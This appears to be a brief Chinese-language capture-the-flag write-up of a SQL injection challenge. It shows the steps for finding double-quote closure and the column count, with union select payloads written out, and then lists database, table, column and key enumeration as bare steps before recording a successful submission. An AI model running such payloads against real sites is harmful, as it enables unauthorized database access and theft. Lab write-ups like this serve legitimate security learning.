1.输入?id=2-1 回显第二个账号,说明不是整数型注入,需要闭合
2.输入 id=1' 回显成功,没有报错,说明闭合符号没有单引号
3.输入 id=1" 没有回显也没有报错信息,说明闭合符号含有双引号
4.输入 ?id=2" and 1="1 登录回显第二个账号,说明是双引号闭合
5.?id=0" union select 1,2--+ 没有回显,说明不是两个字段
6.?id=0" union select 1,2,3--+ 2,3的位置有回显说明是三个字段。
7.查库
8.查表名
9.查字段
10.爆密钥
最后提交成功
